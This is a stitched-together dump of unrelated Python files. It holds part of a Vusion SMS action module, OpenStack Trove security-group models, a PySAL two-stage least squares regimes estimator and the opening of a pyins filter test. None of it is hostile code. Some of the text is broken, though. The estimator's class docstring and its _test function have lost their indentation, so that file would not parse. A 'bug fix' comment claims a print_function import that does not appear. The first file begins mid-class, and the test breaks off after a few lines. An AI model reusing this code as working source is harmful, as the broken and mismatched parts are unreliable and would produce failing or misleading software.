        # Build {'key1': v1, 'key2': v2, ...} from the row keys and return
        # it together with the next free key index.
        i = 1
        match = {}
        for key in self['scvt-row-keys']:
            match.update({'key%s' % i: key['scvt-row-value']})
            i = i + 1
        return match, i

    def get_match(self):
        """Match for the main cell: row key values plus the column header."""
        match, i = self._get_row_match()
        match.update({'key%s' % i: self['scvt-col-key-header']})
        return match

    def get_extra_matchs(self):
        """Return [(match, extra-value), ...], one pair per extra column.

        (Also removed an unused local `j = i` left over in the loop.)
        """
        row_match, i = self._get_row_match()
        matchs = []
        for extra_cv in self['scvt-col-extras']:
            match = row_match.copy()
            match.update({'key%s' % i: extra_cv['scvt-col-extra-header']})
            matchs.append((match, extra_cv['scvt-col-extra-value']))
        return matchs

    def get_table_id(self):
        return self['scvt-attached-table']
def action_generator(**kwargs):
    """Instantiate the Action subclass matching kwargs['type-action'].

    Raises VusionError for unsupported action types.
    """
    # Compatibility shim, to be removed once the Dialogue structure is frozen.
    if 'type-action' not in kwargs:
        kwargs['type-action'] = kwargs['type-answer-action']
    dispatch = {
        'optin': OptinAction,
        'optout': OptoutAction,
        'reset': ResetAction,
        'enrolling': EnrollingAction,
        'delayed-enrolling': DelayedEnrollingAction,
        'tagging': TaggingAction,
        'profiling': ProfilingAction,
        'feedback': FeedbackAction,
        'sms-mo': SmsMoAction,
        'unmatching-answer': UnMatchingAnswerAction,
        'remove-reminders': RemoveRemindersAction,
        'remove-deadline': RemoveDeadlineAction,
        'offset-conditioning': OffsetConditionAction,
        'proportional-tagging': ProportionalTagging,
        'proportional-labelling': ProportionalLabelling,
        # Both legacy and current names map to the same action class.
        'message-forwarding': UrlForwarding,
        'url-forwarding': UrlForwarding,
        'sms-forwarding': SmsForwarding,
        'sms-invite': SmsInviteAction,
        'save-content-variable-table': SaveContentVariableTable,
    }
    action_class = dispatch.get(kwargs['type-action'])
    if action_class is None:
        raise VusionError("%r not supported" % kwargs)
    return action_class(**kwargs)
class Actions():
    """Ordered collection of actions.

    'optin', 'reset' and 'enrolling' actions are kept at the front of the
    list, in that priority order; everything else is appended at the end.
    """

    def __init__(self):
        self.actions = []

    def append(self, action):
        """Add an action, placing optin/reset/enrolling before the others."""
        if action.get_type() in ["optin", "enrolling", "reset"]:
            i = 0
            if action.get_type() == "enrolling":
                i = self.get_position_after(["optin", "reset"])
            if action.get_type() == "reset":
                i = self.get_position_after(["optin"])
            self.actions.insert(i, action)
        else:
            self.actions.append(action)

    def get_position_after(self, action_types):
        """Index just past the leading run of actions of the given types."""
        i = 0
        while i < len(self.actions) and self.actions[i].get_type() in action_types:
            i = i + 1
        return i

    def extend(self, actions):
        """Append every action from an iterable, preserving priorities."""
        for action in actions:
            self.append(action)

    def contains(self, action_type):
        """True when any contained action has the given type."""
        for action in self.actions:
            if action.get_type() == action_type:
                return True
        return False

    def items(self):
        return self.actions.__iter__()

    def __getitem__(self, key):
        return self.actions[key]

    def get_priority_action(self):
        """Pop and return the highest-priority (first) action."""
        return self.actions.pop(0)

    def __len__(self):
        return len(self.actions)

    def __eq__(self, other):
        if not isinstance(other, Actions):
            return False
        if len(self.actions) != len(other.actions):
            return False
        for i in range(0, len(self)):
            if not self.actions[i] == other.actions[i]:
                return False
        return True

    def clear_all(self):
        self.actions = []

    def keep_only_remove_action(self):
        """Drop every action that is not a remove-* action.

        BUG FIX: the previous implementation removed elements from
        self.actions while iterating over it, which skips the element that
        follows each removal; the list is now rebuilt instead.
        """
        self.actions = [
            action for action in self.actions
            if action.get_type() in ('remove-reminders',
                                     'remove-deadline',
                                     'remove-question')]
|
|
# Copyright 2013 Hewlett-Packard Development Company, L.P.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""
Model classes for Security Groups and Security Group Rules on instances.
"""
from trove.common import cfg
from trove.common import exception
from trove.db.models import DatabaseModelBase
from trove.common.models import NetworkRemoteModelBase
from trove.openstack.common import log as logging
from trove.openstack.common.gettextutils import _
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
def persisted_models():
    """Map persisted model names to the classes defined in this module."""
    return dict(
        security_group=SecurityGroup,
        security_group_rule=SecurityGroupRule,
        security_group_instance_association=SecurityGroupInstanceAssociation,
    )
class SecurityGroup(DatabaseModelBase):
    """Trove-side database record of a remote security group."""

    _data_fields = ['id', 'name', 'description', 'user', 'tenant_id',
                    'created', 'updated', 'deleted', 'deleted_at']

    @property
    def instance_id(self):
        # Id of the instance this security group is associated with.
        return SecurityGroupInstanceAssociation\
            .get_instance_id_by_security_group_id(self.id)

    @classmethod
    def create_sec_group(cls, name, description, context):
        """Create the remote security group, then the local db record.

        Raises SecurityGroupCreationError when the remote call fails.
        """
        try:
            remote_sec_group = RemoteSecurityGroup.create(name,
                                                          description,
                                                          context)
            if not remote_sec_group:
                raise exception.SecurityGroupCreationError(
                    "Failed to create Security Group")
            else:
                return cls.create(
                    id=remote_sec_group.data()['id'],
                    name=name,
                    description=description,
                    user=context.user,
                    tenant_id=context.tenant)
        except exception.SecurityGroupCreationError as e:
            LOG.exception("Failed to create remote security group")
            raise e

    @classmethod
    def create_for_instance(cls, instance_id, context):
        """Create a security group for an instance and associate them."""
        # Create a new security group
        name = "%s_%s" % (CONF.trove_security_group_name_prefix, instance_id)
        description = _("Security Group for %s") % instance_id
        sec_group = cls.create_sec_group(name, description, context)
        # Currently this locked down by default, since we don't create any
        # default security group rules for the security group.
        # Create security group instance association
        SecurityGroupInstanceAssociation.create(
            security_group_id=sec_group["id"],
            instance_id=instance_id)
        return sec_group

    @classmethod
    def get_security_group_by_id_or_instance_id(cls, id, tenant_id):
        """Look up by security-group id first, then fall back to treating
        `id` as an instance id.

        FIX: classmethod first parameter renamed from `self` to `cls` for
        correctness/consistency with the other classmethods; callers are
        unaffected.
        """
        try:
            return cls.find_by(id=id,
                               tenant_id=tenant_id,
                               deleted=False)
        except exception.ModelNotFoundError:
            return SecurityGroupInstanceAssociation.\
                get_security_group_by_instance_id(id)

    def get_rules(self):
        """Return all non-deleted rules belonging to this group."""
        return SecurityGroupRule.find_all(group_id=self.id,
                                          deleted=False)

    def delete(self, context):
        """Delete the rules, the remote group, then the local record."""
        try:
            sec_group_rules = self.get_rules()
            if sec_group_rules:
                for rule in sec_group_rules:
                    rule.delete(context)
            RemoteSecurityGroup.delete(self.id, context)
            super(SecurityGroup, self).delete()
        except exception.TroveError:
            LOG.exception('Failed to delete security group')
            raise exception.TroveError("Failed to delete Security Group")

    @classmethod
    def delete_for_instance(cls, instance_id, context):
        """Delete the security group associated with an instance, if any."""
        try:
            association = SecurityGroupInstanceAssociation.find_by(
                instance_id=instance_id,
                deleted=False)
            if association:
                sec_group = association.get_security_group()
                if sec_group:
                    sec_group.delete(context)
                association.delete()
        except (exception.ModelNotFoundError,
                exception.TroveError):
            LOG.info(_('Security Group with id: %(id)s '
                       'already had been deleted')
                     % {'id': instance_id})
class SecurityGroupRule(DatabaseModelBase):
    """Trove-side database record of a single security group rule."""

    _data_fields = ['id', 'parent_group_id', 'protocol', 'from_port',
                    'to_port', 'cidr', 'group_id', 'created', 'updated',
                    'deleted', 'deleted_at']

    @classmethod
    def create_sec_group_rule(cls, sec_group, protocol, from_port,
                              to_port, cidr, context):
        """Create the rule remotely, then persist it locally.

        Raises SecurityGroupRuleCreationError when the remote call fails.
        """
        try:
            remote_rule_id = RemoteSecurityGroup.add_rule(
                sec_group_id=sec_group['id'],
                protocol=protocol,
                from_port=from_port,
                to_port=to_port,
                cidr=cidr,
                context=context)
            if not remote_rule_id:
                raise exception.SecurityGroupRuleCreationError(
                    "Failed to create Security Group Rule")
            else:
                # Create db record
                return cls.create(
                    id=remote_rule_id,
                    protocol=protocol,
                    from_port=from_port,
                    to_port=to_port,
                    cidr=cidr,
                    group_id=sec_group['id'])
        except exception.SecurityGroupRuleCreationError as e:
            LOG.exception("Failed to create remote security group")
            raise e

    def get_security_group(self, tenant_id):
        """Return the owning security group, scoped to the given tenant."""
        return SecurityGroup.find_by(id=self.group_id,
                                     tenant_id=tenant_id,
                                     deleted=False)

    def delete(self, context):
        """Delete the rule remotely, then the local record."""
        try:
            # Delete Remote Security Group Rule
            RemoteSecurityGroup.delete_rule(self.id, context)
            super(SecurityGroupRule, self).delete()
        except exception.TroveError:
            LOG.exception('Failed to delete security group')
            # BUG FIX: the raised message previously said "Security Group",
            # but this is the rule-deletion failure path.
            raise exception.SecurityGroupRuleDeletionError(
                "Failed to delete Security Group Rule")
class SecurityGroupInstanceAssociation(DatabaseModelBase):
    """Join record linking a security group to an instance."""

    _data_fields = ['id', 'security_group_id', 'instance_id',
                    'created', 'updated', 'deleted', 'deleted_at']

    def get_security_group(self):
        """Return the associated, non-deleted security group."""
        return SecurityGroup.find_by(id=self.security_group_id,
                                     deleted=False)

    @classmethod
    def get_security_group_by_instance_id(cls, id):
        """Resolve an instance id to its security group."""
        association = cls.find_by(instance_id=id, deleted=False)
        return association.get_security_group()

    @classmethod
    def get_instance_id_by_security_group_id(cls, secgroup_id):
        """Resolve a security group id to its instance id."""
        association = cls.find_by(security_group_id=secgroup_id,
                                  deleted=False)
        return association.instance_id
class RemoteSecurityGroup(NetworkRemoteModelBase):
    """Proxy for a security group living in the remote network service."""

    _data_fields = ['id', 'name', 'description', 'rules']

    def __init__(self, security_group=None, id=None, context=None):
        """Wrap an existing remote group object, or fetch one by id.

        Raises InvalidModelError when neither argument is supplied.
        """
        if security_group is not None:
            self._data_object = security_group
        elif id is not None:
            driver = self.get_driver(context)
            self._data_object = driver.get_sec_group_by_id(group_id=id)
        else:
            msg = "Security Group does not have id defined!"
            raise exception.InvalidModelError(msg)

    @classmethod
    def create(cls, name, description, context):
        """Creates a new Security Group."""
        driver = cls.get_driver(context)
        sec_group = driver.create_security_group(
            name=name, description=description)
        return RemoteSecurityGroup(security_group=sec_group)

    @classmethod
    def delete(cls, sec_group_id, context):
        """Deletes a Security Group."""
        cls.get_driver(context).delete_security_group(sec_group_id)

    @classmethod
    def add_rule(cls, sec_group_id, protocol, from_port,
                 to_port, cidr, context):
        """Adds a new rule to an existing security group."""
        driver = cls.get_driver(context)
        new_rule = driver.add_security_group_rule(
            sec_group_id, protocol, from_port, to_port, cidr)
        return new_rule.id

    @classmethod
    def delete_rule(cls, sec_group_rule_id, context):
        """Deletes a rule from an existing security group."""
        cls.get_driver(context).delete_security_group_rule(sec_group_rule_id)
|
|
import numpy as np
import regimes as REGI
import user_output as USER
import multiprocessing as mp
import scipy.sparse as SP
from utils import sphstack, set_warn, RegressionProps_basic, spdot, sphstack
from twosls import BaseTSLS
from robust import hac_multi
import summary_output as SUMMARY
from platform import system
"""
Two-stage Least Squares estimation with regimes.
"""
__author__ = "Luc Anselin luc.anselin@asu.edu, Pedro V. Amaral pedro.amaral@asu.edu, David C. Folch david.folch@asu.edu"
class TSLS_Regimes(BaseTSLS, REGI.Regimes_Frame):
"""
Two stage least squares (2SLS) with regimes
Parameters
----------
y : array
nx1 array for dependent variable
x : array
Two dimensional array with n rows and one column for each
independent (exogenous) variable, excluding the constant
yend : array
Two dimensional array with n rows and one column for each
endogenous variable
q : array
Two dimensional array with n rows and one column for each
external exogenous variable to use as instruments (note:
this should not contain any variables from x)
regimes : list
List of n values with the mapping of each
observation to a regime. Assumed to be aligned with 'x'.
constant_regi: ['one', 'many']
Switcher controlling the constant term setup. It may take
the following values:
* 'one': a vector of ones is appended to x and held
constant across regimes
* 'many': a vector of ones is appended to x and considered
different per regime (default)
cols2regi : list, 'all'
Argument indicating whether each
column of x should be considered as different per regime
or held constant across regimes (False).
If a list, k booleans indicating for each variable the
option (True if one per regime, False to be held constant).
If 'all' (default), all the variables vary by regime.
regime_err_sep : boolean
If True, a separate regression is run for each regime.
robust : string
If 'white', then a White consistent estimator of the
variance-covariance matrix is given.
If 'hac', then a HAC consistent estimator of the
variance-covariance matrix is given.
If 'ogmm', then Optimal GMM is used to estimate
betas and the variance-covariance matrix.
Default set to None.
gwk : pysal W object
Kernel spatial weights needed for HAC estimation. Note:
matrix must have ones along the main diagonal.
sig2n_k : boolean
If True, then use n-k to estimate sigma^2. If False, use n.
vm : boolean
If True, include variance-covariance matrix in summary
cores : boolean
Specifies if multiprocessing is to be used
Default: no multiprocessing, cores = False
Note: Multiprocessing may not work on all platforms.
name_y : string
Name of dependent variable for use in output
name_x : list of strings
Names of independent variables for use in output
name_yend : list of strings
Names of endogenous variables for use in output
name_q : list of strings
Names of instruments for use in output
name_regimes : string
Name of regimes variable for use in output
name_w : string
Name of weights matrix for use in output
name_gwk : string
Name of kernel weights matrix for use in output
name_ds : string
Name of dataset for use in output
Attributes
----------
betas : array
kx1 array of estimated coefficients
u : array
nx1 array of residuals
predy : array
nx1 array of predicted y values
n : integer
Number of observations
y : array
nx1 array for dependent variable
x : array
Two dimensional array with n rows and one column for each
independent (exogenous) variable, including the constant
Only available in dictionary 'multi' when multiple regressions
(see 'multi' below for details)
yend : array
Two dimensional array with n rows and one column for each
endogenous variable
Only available in dictionary 'multi' when multiple regressions
(see 'multi' below for details)
q : array
Two dimensional array with n rows and one column for each
external exogenous variable used as instruments
Only available in dictionary 'multi' when multiple regressions
(see 'multi' below for details)
vm : array
Variance covariance matrix (kxk)
regimes : list
List of n values with the mapping of each
observation to a regime. Assumed to be aligned with 'x'.
constant_regi: [False, 'one', 'many']
Ignored if regimes=False. Constant option for regimes.
Switcher controlling the constant term setup. It may take
the following values:
* 'one': a vector of ones is appended to x and held
constant across regimes
* 'many': a vector of ones is appended to x and considered
different per regime
cols2regi : list, 'all'
Ignored if regimes=False. Argument indicating whether each
column of x should be considered as different per regime
or held constant across regimes (False).
If a list, k booleans indicating for each variable the
option (True if one per regime, False to be held constant).
If 'all', all the variables vary by regime.
regime_err_sep : boolean
If True, a separate regression is run for each regime.
kr : int
Number of variables/columns to be "regimized" or subject
to change by regime. These will result in one parameter
estimate by regime for each variable (i.e. nr parameters per
variable)
kf : int
Number of variables/columns to be considered fixed or
global across regimes and hence only obtain one parameter
estimate
nr : int
Number of different regimes in the 'regimes' list
name_y : string
Name of dependent variable for use in output
name_x : list of strings
Names of independent variables for use in output
name_yend : list of strings
Names of endogenous variables for use in output
name_q : list of strings
Names of instruments for use in output
name_regimes : string
Name of regimes variable for use in output
name_w : string
Name of weights matrix for use in output
name_gwk : string
Name of kernel weights matrix for use in output
name_ds : string
Name of dataset for use in output
multi : dictionary
Only available when multiple regressions are estimated,
i.e. when regime_err_sep=True and no variable is fixed
across regimes.
Contains all attributes of each individual regression
Examples
--------
We first need to import the needed modules, namely numpy to convert the
data we read into arrays that ``spreg`` understands and ``pysal`` to
perform all the analysis.
>>> import numpy as np
>>> import pysal
Open data on NCOVR US County Homicides (3085 areas) using pysal.open().
This is the DBF associated with the NAT shapefile. Note that
pysal.open() also reads data in CSV format; since the actual class
requires data to be passed in as numpy arrays, the user can read their
data in using any method.
>>> db = pysal.open(pysal.examples.get_path("NAT.dbf"),'r')
Extract the HR90 column (homicide rates in 1990) from the DBF file and make it the
dependent variable for the regression. Note that PySAL requires this to be
an numpy array of shape (n, 1) as opposed to the also common shape of (n, )
that other packages accept.
>>> y_var = 'HR90'
>>> y = np.array([db.by_col(y_var)]).reshape(3085,1)
Extract UE90 (unemployment rate) and PS90 (population structure) vectors from
the DBF to be used as independent variables in the regression. Other variables
    can be inserted by adding their names to x_var, such as x_var = ['Var1','Var2',...]
Note that PySAL requires this to be an nxj numpy array, where j is the
number of independent variables (not including a constant). By default
this model adds a vector of ones to the independent variables passed in.
>>> x_var = ['PS90','UE90']
>>> x = np.array([db.by_col(name) for name in x_var]).T
In this case we consider RD90 (resource deprivation) as an endogenous regressor.
We tell the model that this is so by passing it in a different parameter
from the exogenous variables (x).
>>> yd_var = ['RD90']
>>> yd = np.array([db.by_col(name) for name in yd_var]).T
Because we have endogenous variables, to obtain a correct estimate of the
model, we need to instrument for RD90. We use FP89 (families below poverty)
for this and hence put it in the instruments parameter, 'q'.
>>> q_var = ['FP89']
>>> q = np.array([db.by_col(name) for name in q_var]).T
The different regimes in this data are given according to the North and
South dummy (SOUTH).
>>> r_var = 'SOUTH'
>>> regimes = db.by_col(r_var)
Since we want to perform tests for spatial dependence, we need to specify
the spatial weights matrix that includes the spatial configuration of the
observations into the error component of the model. To do that, we can open
an already existing gal file or create a new one. In this case, we will
create one from ``NAT.shp``.
>>> w = pysal.rook_from_shapefile(pysal.examples.get_path("NAT.shp"))
Unless there is a good reason not to do it, the weights have to be
row-standardized so every row of the matrix sums to one. Among other
things, this allows to interpret the spatial lag of a variable as the
average value of the neighboring observations. In PySAL, this can be
easily performed in the following way:
>>> w.transform = 'r'
We can now run the regression and then have a summary of the output
by typing: model.summary
Alternatively, we can just check the betas and standard errors of the
parameters:
>>> tslsr = TSLS_Regimes(y, x, yd, q, regimes, w=w, constant_regi='many', spat_diag=False, name_y=y_var, name_x=x_var, name_yend=yd_var, name_q=q_var, name_regimes=r_var, name_ds='NAT', name_w='NAT.shp')
>>> tslsr.betas
array([[ 3.66973562],
[ 1.06950466],
[ 0.14680946],
[ 2.45864196],
[ 9.55873243],
[ 1.94666348],
[-0.30810214],
[ 3.68718119]])
>>> np.sqrt(tslsr.vm.diagonal())
array([ 0.38389901, 0.09963973, 0.04672091, 0.22725012, 0.49181223,
0.19630774, 0.07784587, 0.25529011])
"""
    def __init__(self, y, x, yend, q, regimes,
                 w=None, robust=None, gwk=None, sig2n_k=True,
                 spat_diag=False, vm=False, constant_regi='many',
                 cols2regi='all', regime_err_sep=True, name_y=None, name_x=None,
                 cores=False, name_yend=None, name_q=None, name_regimes=None,
                 name_w=None, name_gwk=None, name_ds=None, summ=True):
        # Validate inputs and record display names.
        n = USER.check_arrays(y, x)
        USER.check_y(y, n)
        USER.check_weights(w, y)
        USER.check_robust(robust, gwk)
        USER.check_spat_diag(spat_diag, w)
        self.constant_regi = constant_regi
        self.cols2regi = cols2regi
        self.name_ds = USER.set_name_ds(name_ds)
        # NOTE(review): the dataset-name setter is reused for the regimes
        # name here -- confirm this is intentional.
        self.name_regimes = USER.set_name_ds(name_regimes)
        self.name_w = USER.set_name_w(name_w, w)
        self.name_gwk = USER.set_name_w(name_gwk, gwk)
        self.name_y = USER.set_name_y(name_y)
        name_yend = USER.set_name_yend(name_yend, yend)
        name_q = USER.set_name_q(name_q, q)
        self.name_x_r = USER.set_name_x(name_x, x) + name_yend
        self.n = n
        cols2regi = REGI.check_cols2regi(
            constant_regi, cols2regi, x, yend=yend, add_cons=False)
        self.regimes_set = REGI._get_regimes_set(regimes)
        self.regimes = regimes
        USER.check_regimes(self.regimes_set, self.n, x.shape[1])
        # HAC errors are incompatible with per-regime estimation, so
        # regime_err_sep is forced off with a warning in that case.
        if regime_err_sep == True and robust == 'hac':
            set_warn(
                self, "Error by regimes is incompatible with HAC estimation for 2SLS models. Hence, the error by regimes has been disabled for this model.")
            regime_err_sep = False
        self.regime_err_sep = regime_err_sep
        # When every column (and the constant) varies by regime, one
        # independent regression per regime is run; otherwise a single
        # regression on regime-expanded design matrices is estimated.
        if regime_err_sep == True and set(cols2regi) == set([True]) and constant_regi == 'many':
            name_x = USER.set_name_x(name_x, x)
            self.y = y
            # Map each regime to the row indices of its observations.
            regi_ids = dict(
                (r, list(np.where(np.array(regimes) == r)[0])) for r in self.regimes_set)
            self._tsls_regimes_multi(x, yend, q, w, regi_ids, cores,
                                     gwk, sig2n_k, robust, spat_diag, vm, name_x, name_yend, name_q)
        else:
            name_x = USER.set_name_x(name_x, x, constant=True)
            # Expand q, x and yend by regime (constant handling differs
            # between the exogenous block and the others).
            q, self.name_q = REGI.Regimes_Frame.__init__(self, q,
                                                         regimes, constant_regi=None, cols2regi='all', names=name_q)
            x, self.name_x = REGI.Regimes_Frame.__init__(self, x,
                                                         regimes, constant_regi, cols2regi=cols2regi, names=name_x)
            yend, self.name_yend = REGI.Regimes_Frame.__init__(self, yend,
                                                               regimes, constant_regi=None,
                                                               cols2regi=cols2regi, yend=True, names=name_yend)
            if regime_err_sep == True and robust == None:
                robust = 'white'
            BaseTSLS.__init__(self, y=y, x=x, yend=yend, q=q,
                              robust=robust, gwk=gwk, sig2n_k=sig2n_k)
            self.title = "TWO STAGE LEAST SQUARES - REGIMES"
            if robust == 'ogmm':
                _optimal_weight(self, sig2n_k)
            self.name_z = self.name_x + self.name_yend
            self.name_h = USER.set_name_h(self.name_x, self.name_q)
            self.chow = REGI.Chow(self)
            self.robust = USER.set_robust(robust)
            if summ:
                SUMMARY.TSLS(
                    reg=self, vm=vm, w=w, spat_diag=spat_diag, regimes=True)
    def _tsls_regimes_multi(self, x, yend, q, w, regi_ids, cores,
                            gwk, sig2n_k, robust, spat_diag, vm, name_x, name_yend, name_q):
        """Run one BaseTSLS regression per regime (serially or via a
        multiprocessing pool) and stitch the per-regime results back into
        this instance (block-diagonal vm, stacked betas, residuals, names).
        """
        results_p = {}
        """
        for r in self.regimes_set:
            if system() != 'Windows':
                is_win = True
                results_p[r] = _work(*(self.y,x,w,regi_ids,r,yend,q,robust,sig2n_k,self.name_ds,self.name_y,name_x,name_yend,name_q,self.name_w,self.name_regimes))
            else:
                pool = mp.Pool(cores)
                results_p[r] = pool.apply_async(_work,args=(self.y,x,w,regi_ids,r,yend,q,robust,sig2n_k,self.name_ds,self.name_y,name_x,name_yend,name_q,self.name_w,self.name_regimes))
                is_win = False
        """
        for r in self.regimes_set:
            if cores:
                # NOTE(review): a new Pool is created on every iteration and
                # only the last one is closed below -- confirm whether a
                # single pool created before the loop was intended.
                pool = mp.Pool(None)
                results_p[r] = pool.apply_async(_work, args=(
                    self.y, x, w, regi_ids, r, yend, q, robust, sig2n_k, self.name_ds, self.name_y, name_x, name_yend, name_q, self.name_w, self.name_regimes))
            else:
                results_p[r] = _work(*(self.y, x, w, regi_ids, r, yend, q, robust, sig2n_k,
                                       self.name_ds, self.name_y, name_x, name_yend, name_q, self.name_w, self.name_regimes))
        # Dimensions: kr regime-varying coefficients (x, yend and the
        # constant), no fixed coefficients, nr regimes.
        self.kryd = 0
        self.kr = x.shape[1] + yend.shape[1] + 1
        self.kf = 0
        self.nr = len(self.regimes_set)
        self.vm = np.zeros((self.nr * self.kr, self.nr * self.kr), float)
        self.betas = np.zeros((self.nr * self.kr, 1), float)
        self.u = np.zeros((self.n, 1), float)
        self.predy = np.zeros((self.n, 1), float)
        """
        if not is_win:
            pool.close()
            pool.join()
        """
        if cores:
            pool.close()
            pool.join()
        results = {}
        self.name_y, self.name_x, self.name_yend, self.name_q, self.name_z, self.name_h = [
        ], [], [], [], [], []
        counter = 0
        for r in self.regimes_set:
            """
            if is_win:
                results[r] = results_p[r]
            else:
                results[r] = results_p[r].get()
            """
            if not cores:
                results[r] = results_p[r]
            else:
                results[r] = results_p[r].get()
            # Place each regime's vm on the block diagonal and stack betas,
            # residuals and predictions back into full-sample arrays.
            self.vm[(counter * self.kr):((counter + 1) * self.kr),
                    (counter * self.kr):((counter + 1) * self.kr)] = results[r].vm
            self.betas[
                (counter * self.kr):((counter + 1) * self.kr), ] = results[r].betas
            self.u[regi_ids[r], ] = results[r].u
            self.predy[regi_ids[r], ] = results[r].predy
            self.name_y += results[r].name_y
            self.name_x += results[r].name_x
            self.name_yend += results[r].name_yend
            self.name_q += results[r].name_q
            self.name_z += results[r].name_z
            self.name_h += results[r].name_h
            counter += 1
        self.multi = results
        self.hac_var = sphstack(x, q)
        if robust == 'hac':
            hac_multi(self, gwk)
        if robust == 'ogmm':
            set_warn(
                self, "Residuals treated as homoskedastic for the purpose of diagnostics.")
        self.chow = REGI.Chow(self)
        if spat_diag:
            self._get_spat_diag_props(results, regi_ids, x, yend, q)
        SUMMARY.TSLS_multi(
            reg=self, multireg=self.multi, vm=vm, spat_diag=spat_diag, regimes=True, w=w)
    def _get_spat_diag_props(self, results, regi_ids, x, yend, q):
        """Recompute the pooled z, h and varb matrices needed by the
        spatial diagnostics on the regime-expanded design matrices."""
        self._cache = {}
        x = USER.check_constant(x)
        x = REGI.regimeX_setup(
            x, self.regimes, [True] * x.shape[1], self.regimes_set)
        # z = [X | Yend] and h = [X | Q], both expanded by regime.
        self.z = sphstack(x, REGI.regimeX_setup(
            yend, self.regimes, [True] * yend.shape[1], self.regimes_set))
        self.h = sphstack(
            x, REGI.regimeX_setup(q, self.regimes, [True] * q.shape[1], self.regimes_set))
        hthi = np.linalg.inv(spdot(self.h.T, self.h))
        zth = spdot(self.z.T, self.h)
        # varb = [Z'H (H'H)^-1 H'Z]^-1, the 2SLS coefficient covariance core.
        self.varb = np.linalg.inv(spdot(spdot(zth, hthi), zth.T))
def _work(y, x, w, regi_ids, r, yend, q, robust, sig2n_k, name_ds, name_y, name_x, name_yend, name_q, name_w, name_regimes):
    """Estimate one regime's 2SLS model (helper for the multi-regime run).

    Subsets all arrays to regime r, fits a BaseTSLS model, then decorates
    it with regime-prefixed display names and, when given, the
    regime-restricted weights matrix.
    """
    rows = regi_ids[r]
    y_r = y[rows]
    x_r = x[rows]
    yend_r = yend[rows]
    q_r = q[rows]
    x_constant = USER.check_constant(x_r)
    # HAC and optimal-GMM corrections are applied later on the pooled
    # model, so the per-regime fit runs without them.
    robust2 = None if robust in ('hac', 'ogmm') else robust
    model = BaseTSLS(
        y_r, x_constant, yend_r, q_r, robust=robust2, sig2n_k=sig2n_k)
    model.title = "TWO STAGE LEAST SQUARES ESTIMATION - REGIME %s" % r
    if robust == 'ogmm':
        _optimal_weight(model, sig2n_k, warn=False)
    model.robust = USER.set_robust(robust)
    model.name_ds = name_ds
    prefix = str(r)
    model.name_y = '%s_%s' % (prefix, name_y)
    model.name_x = ['%s_%s' % (prefix, i) for i in name_x]
    model.name_yend = ['%s_%s' % (prefix, i) for i in name_yend]
    model.name_z = model.name_x + model.name_yend
    model.name_q = ['%s_%s' % (prefix, i) for i in name_q]
    model.name_h = model.name_x + model.name_q
    model.name_w = name_w
    model.name_regimes = name_regimes
    if w:
        w_r, warn = REGI.w_regime(w, regi_ids[r], r, transform=True)
        set_warn(model, warn)
        model.w = w_r
    return model
def _optimal_weight(reg, sig2n_k, warn=True):
    """Re-estimate the 2SLS coefficients of ``reg`` in place using the
    optimal GMM weighting matrix built from the squared residuals.

    Parameters
    ----------
    reg     : fitted regression object exposing h, z, y, u, n and k.
    sig2n_k : bool; if True scale by (n - k) degrees of freedom,
              otherwise by n.
    warn    : bool; if True record a note that diagnostics still treat
              the residuals as homoskedastic.
    """
    # h may be a sparse matrix (has .toarray()) or a dense array; catch
    # only AttributeError instead of a bare except that hides real errors.
    try:
        Hu = reg.h.toarray() * reg.u ** 2
    except AttributeError:
        Hu = reg.h * reg.u ** 2
    # S = H' diag(u^2) H scaled by n or (n - k): the moment covariance.
    if sig2n_k:
        S = spdot(reg.h.T, Hu, array_out=True) / (reg.n - reg.k)
    else:
        S = spdot(reg.h.T, Hu, array_out=True) / reg.n
    Si = np.linalg.inv(S)
    ZtH = spdot(reg.z.T, reg.h)
    ZtHSi = spdot(ZtH, Si)
    # betas = [Z'H S^-1 H'Z]^-1 Z'H S^-1 H'y  (optimal-weighted estimator).
    fac2 = np.linalg.inv(spdot(ZtHSi, ZtH.T, array_out=True))
    fac3 = spdot(ZtHSi, spdot(reg.h.T, reg.y), array_out=True)
    betas = np.dot(fac2, fac3)
    if sig2n_k:
        vm = fac2 * (reg.n - reg.k)
    else:
        vm = fac2 * reg.n
    RegressionProps_basic(reg, betas=betas, vm=vm, sig2=False)
    reg.title += " (Optimal-Weighted GMM)"
    if warn:
        set_warn(
            reg, "Residuals treated as homoskedastic for the purpose of diagnostics.")
    return
def _test():
import doctest
start_suppress = np.get_printoptions()['suppress']
np.set_printoptions(suppress=True)
doctest.testmod()
np.set_printoptions(suppress=start_suppress)
if __name__ == '__main__':
    _test()

    import numpy as np
    import pysal

    # Example: regime-wise 2SLS on the NAT homicide data, with UE60 as the
    # endogenous regressor instrumented by FP59 and MA60.
    db = pysal.open(pysal.examples.get_path('NAT.dbf'), 'r')
    y_var = 'HR60'
    y = np.array([db.by_col(y_var)]).T
    x_var = ['PS60', 'DV60', 'RD60']
    x = np.array([db.by_col(name) for name in x_var]).T
    yd_var = ['UE60']
    yd = np.array([db.by_col(name) for name in yd_var]).T
    q_var = ['FP59', 'MA60']
    q = np.array([db.by_col(name) for name in q_var]).T
    r_var = 'SOUTH'
    regimes = db.by_col(r_var)
    tslsr = TSLS_Regimes(y, x, yd, q, regimes, constant_regi='many', spat_diag=False, name_y=y_var, name_x=x_var,
                         name_yend=yd_var, name_q=q_var, name_regimes=r_var, cols2regi=[
                             False, True, True, True],
                         sig2n_k=False)
    # Bug fix: `print tslsr.summary` was Python-2 statement syntax, which is
    # a SyntaxError here (the module imports print_function).
    print(tslsr.summary)
|
|
from numpy.testing import (assert_, assert_allclose, run_module_suite,
assert_equal)
import numpy as np
import pandas as pd
from pyins.filt import (InertialSensor, LatLonObs, VeVnObs, propagate_errors,
FeedforwardFilter, FeedbackFilter, traj_diff,
_refine_stamps, _kalman_correct, correct_traj)
from pyins import earth
from pyins import sim
from pyins.integrate import integrate, coning_sculling, Integrator
from pyins.transform import perturb_ll
def test_InertialSensor():
    """Verify the state-space error model built by InertialSensor for each
    supported error source (bias, scale, correlated noise) and for all
    three combined."""
    # No error model requested: every matrix/collection is empty.
    s = InertialSensor()
    assert_equal(s.n_states, 0)
    assert_equal(s.n_noises, 0)
